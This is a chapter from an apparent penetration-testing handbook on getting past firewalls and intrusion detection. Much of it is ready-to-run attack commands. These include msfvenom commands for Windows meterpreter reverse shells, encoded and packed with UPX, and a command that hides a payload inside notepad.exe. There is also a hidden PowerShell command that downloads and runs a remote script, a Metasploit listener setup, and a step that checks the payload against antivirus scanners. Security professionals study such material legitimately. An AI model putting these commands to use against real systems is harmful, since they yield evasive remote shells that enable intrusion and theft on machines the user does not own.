Firewall and IDS/IPS Evasion

Overview

Firewalls and intrusion detection/prevention systems (IDS/IPS) are critical components of modern network security. As penetration testers, understanding how to bypass these defenses is essential for conducting stealthy and effective engagements. This chapter covers techniques for evading detection and delivering payloads while maintaining operational security.

Firewall and IDS/IPS Basics

  1. Firewalls:

    • Control traffic flow based on predefined rules.

    • Block or allow packets based on:

      • Source/Destination IP

      • Ports

      • Protocols

    • Types:

      • Network Firewalls (e.g., hardware-based solutions like Cisco ASA)

      • Host-Based Firewalls (e.g., Windows Defender Firewall)

  2. IDS/IPS:

    • IDS (Intrusion Detection System): Monitors traffic for suspicious activity and raises alerts.

    • IPS (Intrusion Prevention System): Actively blocks malicious traffic.

    • Detection methods:

      • Signature-Based: Matches traffic patterns against known attack signatures.

      • Anomaly-Based: Flags traffic that deviates from normal behavior.

Techniques for Firewall Evasion

  1. Port Spoofing:

    • Use non-standard ports for payload delivery (e.g., port 443 for HTTPS).

    • Example:

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=443 -f exe > payload.exe

  2. Payload Obfuscation:

    • Encode payloads using tools like msfvenom:

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encoded_payload.exe

  3. Split Payload Delivery:

    • Deliver payloads in fragments to bypass large-payload filters.

    • Example: Use PowerShell to download and execute a payload in memory:

      powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/payload.ps1')"

  4. DNS Tunneling:

    • Encapsulate payload traffic in DNS queries to bypass firewalls.

    • Example tool: dnscat2.

  5. HTTP/HTTPS Tunneling:

    • Use HTTP/HTTPS to route traffic through firewalls that allow web traffic.

    • Configure a reverse shell:

      msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe > https_payload.exe

Techniques for IDS/IPS Evasion

  1. Signature Evasion:

    • Modify payloads to avoid matching known attack patterns:

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -f exe > stealth_payload.exe

  2. Traffic Encryption:

    • Use encrypted channels (e.g., HTTPS) for command and control traffic.

    • Example:

      use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST <ip>
set LPORT 443
exploit

  3. Timing Attacks:

    • Send traffic in bursts or delays to avoid triggering anomaly-based detection.

    • Example: Use Nmap with timing options:

      nmap -T2 -sS <target_ip>

  4. Packer Tools:

    • Use packers to obfuscate executable payloads.

    • Popular packers:

      • UPX:

        upx --best --lzma payload.exe

      • Themida: Advanced commercial packer with anti-reverse engineering features.

  5. Legitimate Application Templates:

    • Embed payloads in legitimate applications or documents.

    • Example:

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -x notepad.exe -k -f exe > notepad_payload.exe

Evasion Example: Using msfvenom with Custom Templates

  1. Generate an Encrypted Payload:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > payload.exe

  2. Embed Payload in a Legitimate Application:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -x notepad.exe -k -f exe > safe_payload.exe

  3. Use HTTPS for Stealth:

    msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe > https_payload.exe

  4. Verify Payload Detection:

    • Upload the payload to VirusTotal to check for AV detection:

      msf-virustotal -k <api_key> -f payload.exe

Best Practices for Evasion

  1. Test in a Sandbox:

    • Verify payload functionality in a controlled environment.

  2. Avoid Reuse:

    • Customize payloads for each engagement to avoid detection by updated signatures.

  3. Combine Techniques:

    • Layer multiple evasion methods (e.g., encoding + encryption).

  4. Stay Updated:

    • Keep up with the latest evasion techniques and tools.

Command Cheatsheet

Command
Description

msfvenom -p <payload>

Generate payloads.

msfvenom -e <encoder>

Encode payloads for evasion.

upx --best --lzma <file>

Compress and obfuscate payloads.

msf-virustotal -k <api_key>

Check payload detection rates on VirusTotal.

nmap -T2

Conduct slow scans to avoid IDS detection.

PreviousWriting and Importing Custom Modules into MetasploitNextPassword Attacks